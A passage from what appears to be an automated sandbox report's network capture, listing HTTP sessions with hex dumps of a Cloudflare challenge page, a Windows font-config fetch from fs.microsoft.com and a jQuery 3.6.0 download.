                                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                          origin-agent-cluster: ?1
                                                                          2024-10-01 22:42:49 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 62 66 66 37 64 30 31 39 36 32 63 33 33 64 2d 45 57 52 0d 0a 0d 0a
                                                                          Data Ascii: Server: cloudflareCF-RAY: 8cbff7d01962c33d-EWR
                                                                          2024-10-01 22:42:49 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                          Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                          Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                          Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                          Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                          Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                          Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                          Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                          Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.649730184.28.90.27443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:49 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          Accept-Encoding: identity
                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                          Range: bytes=0-2147483646
                                                                          User-Agent: Microsoft BITS/7.8
                                                                          Host: fs.microsoft.com
                                                                          2024-10-01 22:42:49 UTC515INHTTP/1.1 200 OK
                                                                          ApiVersion: Distribute 1.1
                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                          Content-Type: application/octet-stream
                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                          Server: ECAcc (lpl/EF06)
                                                                          X-CID: 11
                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                          X-Ms-Region: prod-weu-z1
                                                                          Cache-Control: public, max-age=151325
                                                                          Date: Tue, 01 Oct 2024 22:42:49 GMT
                                                                          Content-Length: 55
                                                                          Connection: close
                                                                          X-CID: 2
                                                                          2024-10-01 22:42:49 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.649732151.101.2.1374434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:49 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                          Host: code.jquery.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:49 UTC613INHTTP/1.1 200 OK
                                                                          Connection: close
                                                                          Content-Length: 89501
                                                                          Server: nginx
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                          ETag: "28feccc0-15d9d"
                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                          Access-Control-Allow-Origin: *
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                          Accept-Ranges: bytes
                                                                          Age: 1773540
                                                                          Date: Tue, 01 Oct 2024 22:42:49 GMT
                                                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740056-EWR
                                                                          X-Cache: HIT, HIT
                                                                          X-Cache-Hits: 5889, 0
                                                                          X-Timer: S1727822570.666491,VS0,VE1
                                                                          Vary: Accept-Encoding
                                                                          2024-10-01 22:42:49 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                          2024-10-01 22:42:49 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                          2024-10-01 22:42:49 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                          2024-10-01 22:42:49 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                          2024-10-01 22:42:49 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                          2024-10-01 22:42:49 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                          2024-10-01 22:42:49 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
